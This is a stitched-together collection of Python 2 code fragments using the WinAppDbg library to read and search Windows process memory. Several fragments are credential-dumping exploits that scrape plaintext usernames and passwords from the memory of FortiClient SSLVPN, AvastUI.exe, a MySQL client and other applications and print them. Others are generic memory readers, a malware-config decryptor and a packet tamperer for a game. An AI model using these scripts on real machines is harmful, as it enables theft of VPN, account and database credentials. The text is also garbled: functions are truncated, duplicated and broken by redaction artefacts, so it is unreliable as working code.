def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'******'[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found
def main():
print("Process memory reader")
print("by Mario Vilas (mvilas at gmail.com)")
print
if len(sys.argv) not in (4, 5):
script = os.path.basename(sys.argv[0])
print(" %s <pid> <address> <size> [binary output file]" % script)
print(" %s <process.exe> <address> <size> [binary output file]" %
script)
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print("Process not found: %s" % sys.argv[1])
return
if len(pl) > 1:
print("Multiple processes found for %s" % sys.argv[1])
for p, n in pl:
print("\t%s: %s" % (HexDump.integer(p), n))
return
pid = pl[0][0].get_pid()
try:
address = HexInput.integer(sys.argv[2])
except Exception:
print("Invalid value for address: %s" % sys.argv[2])
return
try:
size = HexInput.integer(sys.argv[3])
except Exception:
print("Invalid value for size: %s" % sys.argv[3])
return
p = Process(pid)
data = p.read(address, size)
## data = p.peek(address, size)
print("Read %d bytes from PID %d" % (len(data), pid))
if len(sys.argv) == 5:
filename = sys.argv[4]
open(filename, 'wb').write(data)
print("Written %d bytes to %s" % (len(data), filename))
else:
if win32.sizeof(win32.LPVOID) == win32.sizeof(win32.DWORD):
width = 16
else:
width = 8
print
print(HexDump.hexblock(data, address, width=width))
def main():
print "Process memory reader"
print "by Mario Vilas (mvilas at gmail.com)"
print
if len(sys.argv) not in (4, 5):
script = os.path.basename(sys.argv[0])
print " %s <pid> <address> <size> [binary output file]" % script
print " %s <process.exe> <address> <size> [binary output file]" % script
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print "Process not found: %s" % sys.argv[1]
return
if len(pl) > 1:
print "Multiple processes found for %s" % sys.argv[1]
for p,n in pl:
print "\t%s: %s" % (HexDump.integer(p),n)
return
pid = pl[0][0].get_pid()
try:
address = HexInput.integer(sys.argv[2])
except Exception:
print "Invalid value for address: %s" % sys.argv[2]
return
try:
size = HexInput.integer(sys.argv[3])
except Exception:
print "Invalid value for size: %s" % sys.argv[3]
return
p = Process(pid)
data = p.read(address, size)
## data = p.peek(address, size)
print "Read %d bytes from PID %d" % (len(data), pid)
if len(sys.argv) == 5:
filename = sys.argv[4]
open(filename, 'wb').write(data)
print "Written %d bytes to %s" % (len(data), filename)
else:
if win32.sizeof(win32.LPVOID) == win32.sizeof(win32.DWORD):
width = 16
else:
width = 8
print
print HexDump.hexblock(data, address, width = width)
def process_read( pid, address, length ):
# Instance a Process object.
process = Process( pid )
# Read the process memory.
data = process.read( address, length )
# You can also change the process memory.
# process.write( address, "example data" )
# Return a Python string with the memory contents.
return data
def hex_string(pid, addr, size, flag=1):
x = int(addr, 16)
process = Process(pid)
data = process.read(x, size * 8)
#hexdump = HexDump.printable( data )
if flag == 3:
print HexDump.hexblock_dword(data, address=True, width=16)
elif flag == 2:
print HexDump.hexblock_word(data, address=True, width=16)
else:
print HexDump.hexblock(data, address=True, width=16)
def show_disassemble(pid, addr, size, Flag=True):
x = int(addr, 16)
process = Process(pid)
if Flag == True:
code = process.disassemble(x, size * 8)
else:
data = process.read(x, size * 8)
code = process.disassemble_string(x, data)
s = ''
for line in code:
print CrashDump.dump_code_line(line, bShowDump=True, dwDumpWidth=16)
s += CrashDump.dump_shell_line(line)
return s
def memory_search( pid, strings ):
process = Process( pid )
mem_dump = []
######
# You could also use process.search_regexp to use regular expressions,
# or process.search_text for Unicode strings,
# or process.search_hexa for raw bytes represented in hex.
######
for address in process.search_bytes( strings ):
dump = process.read(address-10,800) #Dump 810 bytes from process memory
mem_dump.append(dump)
for i in mem_dump:
if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen.
print "\n"
print " [+] Address and port to connect: " + str(i[136:180])
print " [+] UserName: "******" [+] Password: "******"\n"
def recvInPackets(self,event):
nPid = event.get_pid()
oProcess = Process(nPid)
if(self.bStartLog ==True):
#RECV_LENGTH_ADDRESS = 0x0018FC04
#RECV_ADDRESS = 0x0018FC10
RECV_LENGTH_ADDRESS = 0x0018FC14
RECV_ADDRESS = 0x0018FC20
if(oProcess.is_address_readable(RECV_ADDRESS)):
address = oProcess.read_pointer(RECV_ADDRESS)
if(oProcess.is_address_readable(address)):
sLength = oProcess.read(RECV_LENGTH_ADDRESS,1)
nLength = int(toHex(sLength),16)
if(nLength>0):
file = open("config/recv.cfg", "r")
hPacket = self.checkInPacket(address,oProcess,nLength)
if(self.bBlock==True):
if(len(self.lBlockRecv)>0):
for pck in self.lBlockRecv:
if(hPacket == pck):
bytes = len(hPacket)/2
packie = ""
for i in range(0,bytes):
packie +="00"
print packie
blockPacket = binascii.unhexlify(packie)
oProcess.write(address,blockPacket)
hPacket = self.checkInPacket(address,oProcess,nLength)
if(hPacket[0:4]=='2901'):
stackDbg.put("RCV|"+hPacket)
self.recvQuests(hPacket)
elif(hPacket[0:4]=='5401'):
stackDbg.put("RCV|"+hPacket)
self.editQuests(hPacket)
elif(hPacket[0:2]=='36'):
stackDbg.put("RCV|"+hPacket)
else:
stackDbg.put("RCV|"+hPacket)
else:
event.debug.dont_break_at(nPid,self.hRecvAddress)
def memory_search(pid, strings):
process = Process(pid)
mem_dump = []
######
# You could also use process.search_regexp to use regular expressions,
# or process.search_text for Unicode strings,
# or process.search_hexa for raw bytes represented in hex.
######
for address in process.search_bytes(strings):
dump = process.read(address - 10,
800) #Dump 810 bytes from process memory
mem_dump.append(dump)
for i in mem_dump:
if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen.
print "\n"
print " [+] Address and port to connect: " + str(i[136:180])
print " [+] UserName: "******" [+] Password: "******"\n"
def search_string(pid, func, size):
process = Process(pid)
print "get_image_base:", hex(process.get_image_base())
print "get_main_module:", process.get_main_module()
dosheader = process.read(process.get_image_base(), 100)
print ''.join(["%02X " % ord(x) for x in dosheader]).strip()
sys.exit(0)
search_dll, search_func = _split_dll_func(func)
print search_dll, ":", search_func
if search_dll is None or search_func is None:
print "%s not found!" % arg
sys.exit(-1)
dict = {}
for file, file_addr in process.get_modules():
if ismatch(file, ".*" + search_dll + "$") or ismatch(
file, ".*" + search_dll + ".dll$"):
print file, " : ", hex(file_addr), " (", file_addr, ")"
return ""
processname = "AvastUI.exe"
pid = 0
mem_contents = []
email = ""
password = ""
try:
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(processname):
pid = process.get_pid()
if pid is not 0:
print ("AvastUI PID: " + str(pid))
process = Process(pid)
for i in process.search_regexp('"password":"******"Dump: "
print process.read(i[0], 200)
for i in mem_contents:
password = i.split(",")[0]
for i in process.search_regexp('"email":"'):
mem_contents.append(process.read(i[0], 200))
print "Dump: "
print process.read(i[0], 200)
for i in mem_contents:
email = i.split(",")[0]
if email != "" and password != "":
print ""
print "Found Credentials from Memory!"
print email
print password
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process,
process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes(
'\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
memory_dump.append(process.read(address, 150))
for i in range(len(memory_dump[0])):
email_addr = memory_dump[i].split('email=')[1]
tmp_passwd = memory_dump[i].split('password='******'&hiddenEmail=')[0]
password = tmp_passwd.split('&rememberMe=')[0]
if username != '' and password != '':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % urllib.unquote_plus(username)
print "[+] Password: %s" % password
break
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
memory_dump.append(process.read(address,30))
memory_dump.pop(0)
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
last = first.split("00 ")
if last[0]:
count = count+1
found = 1
print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
if found == 0:
print "[-] Password not found! Make sure the client is connected at least to one database."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
class Main(object):
def __init__(self, argv):
self.argv = argv
def parse_cmdline(self):
# An empty command line causes the help message to be shown
if len(self.argv) == 1:
self.argv = self.argv + ['-h']
# Usage string
usage = "%prog [options] <target process IDs or names...>"
self.parser = optparse.OptionParser(usage=usage)
# Options to set the search method
search = optparse.OptionGroup(
self.parser, "What to search",
"(at least one of these switches must be used)")
search.add_option("-s",
"--string",
action="append",
metavar="VALUE",
help="where VALUE is case sensitive text")
search.add_option("-i",
"--istring",
action="append",
metavar="VALUE",
help="where VALUE is case insensitive text")
search.add_option("-x",
"--hexa",
action="append",
metavar="VALUE",
help="where VALUE is hexadecimal data")
search.add_option("-p",
"--pattern",
action="append",
metavar="VALUE",
help="where VALUE is an hexadecimal pattern")
self.parser.add_option_group(search)
# Options to control the search internals
engine = optparse.OptionGroup(self.parser, "How to search")
engine.add_option("-m", "--memory-pages",
action="store", type="int", metavar="NUMBER",
help="maximum number of consecutive memory pages" \
" to read (matches larger than this won't" \
" be found) " \
"[default: 2, use 0 for no limit]")
self.parser.add_option_group(engine)
# Options to set the output type
output = optparse.OptionGroup(self.parser, "What to show")
output.add_option("-v",
"--verbose",
action="store_true",
dest="verbose",
help="verbose output")
output.add_option("-q",
"--quiet",
action="store_false",
dest="verbose",
help="brief output [default]")
self.parser.add_option_group(output)
# Default values
self.parser.set_defaults(
string=[],
istring=[],
hexa=[],
pattern=[],
regexp=[],
memory_pages=2,
verbose=False,
)
# Parse the command line and check for validity
(self.options, self.targets) = self.parser.parse_args(self.argv)
# Our script's filename is not a target, skip it
self.targets = self.targets[1:]
# Fail if no search query was entered
if not self.options.string and \
not self.options.istring and \
not self.options.hexa and \
not self.options.pattern:
self.parser.error("at least one search switch must be used")
def prepare_input(self):
# Build the lists of search objects
self.build_searchers_list(StringSearch)
self.build_searchers_list(TextSearch)
self.build_searchers_list(HexSearch)
self.build_searchers_list(PatternSearch)
# Build the list of target pids
self.build_targets_list()
def build_searchers_list(self, cls):
searchers = getattr(self.options, cls.name)
for index in range(len(searchers)):
try:
searchers[index] = cls(searchers[index], index)
except Exception as e:
msg = cls.init_error_msg(index, searchers[index], e)
self.parser.error(msg)
def build_targets_list(self):
# Take a process snapshot
self.system = System()
self.system.request_debug_privileges()
self.system.scan_processes()
# If no targets were given, search on all processes
if not self.targets:
self.targets = self.system.get_process_ids()
# If targets were given, search only on those processes
else:
expanded_targets = set()
for token in self.targets:
try:
pid = HexInput.integer(token)
if not self.system.has_process(pid):
self.parser.error("process not found: %s" % token)
expanded_targets.add(pid)
except ValueError:
found = self.system.find_processes_by_filename(token)
pidlist = [process.get_pid() for (process, _) in found]
if not pidlist:
self.parser.error("process not found: %s" % token)
expanded_targets.update(pidlist)
self.targets = list(expanded_targets)
# Sort the targets list
self.targets.sort()
def do_search(self):
# For each target process...
for self.pid in self.targets:
# Try to open the process, skip on error
try:
self.process = Process(self.pid)
self.process.get_handle()
except WindowsError:
print("Can't open process %d, skipping" % self.pid)
if self.options.verbose:
print
continue
# Get a list of allocated memory regions
memory = list()
for mbi in self.process.get_memory_map():
if mbi.State == win32.MEM_COMMIT and \
not mbi.Protect & win32.PAGE_GUARD:
memory.append((mbi.BaseAddress, mbi.RegionSize))
# If no allocation limit is set,
# read entire regions and search on them
if self.options.memory_pages <= 0:
for (address, size) in memory:
try:
data = self.process.read(address, size)
except WindowsError as e:
begin = HexDump.address(address)
end = HexDump.address(address + size)
msg = "Error reading %s-%s: %s"
msg = msg % (begin, end, str(e))
print(msg)
if self.options.verbose:
print
continue
self.search_block(data, address, 0)
# If an allocation limit is set,
# read blocks within regions to search
else:
step = self.system.pageSize
size = step * self.options.memory_pages
for (address, total_size) in memory:
try:
end = address + total_size
shift = 0
buffer = self.process.read(address,
min(size, total_size))
while 1:
self.search_block(buffer, address, shift)
shift = step
address = address + step
if address >= end:
break
buffer = buffer[step:]
buffer = buffer + self.process.read(address, step)
except WindowsError as e:
begin = HexDump.address(address)
end = HexDump.address(address + total_size)
msg = "Error reading %s-%s: %s"
msg = msg % (begin, end, str(e))
print(msg)
if self.options.verbose:
print
def search_block(self, data, address, shift):
self.search_block_with(self.options.string, data, address, shift)
self.search_block_with(self.options.istring, data, address, shift)
self.search_block_with(self.options.hexa, data, address, shift)
self.search_block_with(self.options.pattern, data, address, shift)
def search_block_with(self, searchers_list, data, address, shift):
for searcher in searchers_list:
if shift == 0:
searcher.restart()
else:
searcher.shift(shift)
while 1:
searcher.search(data)
if not searcher.found():
break
if self.options.verbose:
print(searcher.message(self.pid, address - shift, data))
print
else:
print(searcher.message(self.pid, address - shift))
def run(self):
# Banner
print("Process memory finder")
print("by Mario Vilas (mvilas at gmail.com)")
print
# Parse the command line
self.parse_cmdline()
# Prepare the input
self.prepare_input()
# Perform the search on the selected targets
self.do_search()
#pattern = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?0 ?4 ?? 00 ?? 00 00 00"
pattern = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?0 ?4 ?? 00 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ??"
f_data = process.search_hexa(pattern, base_addr, base_addr + reg_size)
try:
enc_con_addr = f_data.next()[0] + 0x18
except:
print "Not found"
exit()
print "[*] Encrypted config address: 0x%s" % HexDump.address(
enc_con_addr, 32)
enc_con = process.read(enc_con_addr, 0x2EF)
RC4_key = process.read(enc_con_addr + 0x2EF, 0x39).rstrip('\x00')
print "[*] RC4 key: %s" % RC4_key
dec_con = RC4_dec(RC4_key, enc_con)
conf = re.split("\x00+", dec_con)
print "[*] Config: "
for s in conf:
print s
print "[*] Dumping PE"
PE_dump_path = "tmp_pe_dump"
PE_dump = process.read(base_addr, reg_size)
tmp_file = open(PE_dump_path, "wb+")
tmp_file.write(PE_dump)
tmp_file.close()
def process_read(pid, address, length):
process = Process(pid)
# Read the process memory.
data = process.read(address, length)
return data
def process_read(pid): #, address, length):
process = Process(pid)
data = process.read(address, length)
return data
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address,50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address,60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except:
pass
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process,
process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes(
'\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
memory_dump.append(process.read(address, 30))
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
last = first.split(" 00 2D 70")
if last[0]:
usr = h2b(last[0])
memory_dump = []
for address in process.search_bytes(
'\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
):
memory_dump.append(process.read(address, 100))
sorted(set(memory_dump))
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
print "#########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process,
process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes(
'\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
memory_dump.append(process.read(address, 50))
try:
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
usr = h2b(str.split(' 00')[0])
except:
pass
memory_dump = []
for address in process.search_bytes(
'\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
memory_dump.append(process.read(address, 60))
try:
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
pwd = h2b(str.split(' 00')[0])
except: